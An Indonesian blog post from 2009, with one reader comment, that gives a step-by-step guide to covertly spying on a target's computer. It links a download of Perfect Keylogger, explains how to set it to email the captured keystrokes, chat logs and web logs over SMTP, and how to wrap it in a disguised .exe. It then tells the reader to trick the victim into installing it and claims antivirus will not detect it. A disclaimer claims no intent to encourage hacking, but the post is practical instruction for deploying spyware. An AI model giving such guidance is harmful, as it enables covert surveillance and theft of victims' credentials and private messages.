Kamis, 19 Maret 2009

Cara Menghack

Banyak artikel tutorial tentang hack dengan cara yang berbeda beda disini gue coba jelasin bagaimana cara melakukan hack dengan remote akses. Yang artinya kalian tidak punya akses ke komputer tersebut namun kita bisa mendapatkan segala aktifitas yang dilakukan oleh komputer target mulai dari web log, chat log dan key stroke, semua bisa kalian dapatkan.

Artikel ini tidak bermaksud untuk memberitahukan kepada kalian bagaimana cara melakukan tindakan hacking atau menganjurkan kalian untuk melakukan tindakan hacking, hanya untuk berbagi pengalaman dan sharing.

Pertama yang harus kalian lakukan adalah mendapatkan software yang bernama keylogger merupakan tool yang merekam semua aktifitas pada keyboard target komputer.
Download Software :
http://www.ziddu.com/download/3170646/Perfect.Keylogger.v1.6.5.0.zip.html
Kedua adalah melakukan setup pada software tersebut untuk mendapatkan log file yang akan dikirim kepada email yang tersetup pada pilih option pada software ini.
email_setup-299x217 Cara Melakukan Hack

keterangan gambar :
1. email penerima log attachment
2. SMTP Server
3. username SMPT server
4. password SMPT server
ketiga lakukan remote installation dengan mengcompile file .exe bisa software apa saja.
remoteinstaleerwizard-300x213 Cara Melakukan Hack

Untuk melakukan compile remote installation sangat mudah kita dipandu dengan menu Wizard seperti pada gambar diatas.
langkah terakhir adalah menyebarkan file .exe tersebut kepada komputer target lakukan dengan cara kalian bagamana agar target mau melakukan instal software yang sudah kalian compile ini cara hack yang bener benar terbukti.

Sekali terinstal maka semua aktifitas komputer target akan terekam dan tidak terdetesi oleh Anti virus. Software ini tidak gue complie jadi masih fresh.

1 komentar:

Ario Dwi Pangestu mengatakan...

kk ,bneran nih bisa ngehack ?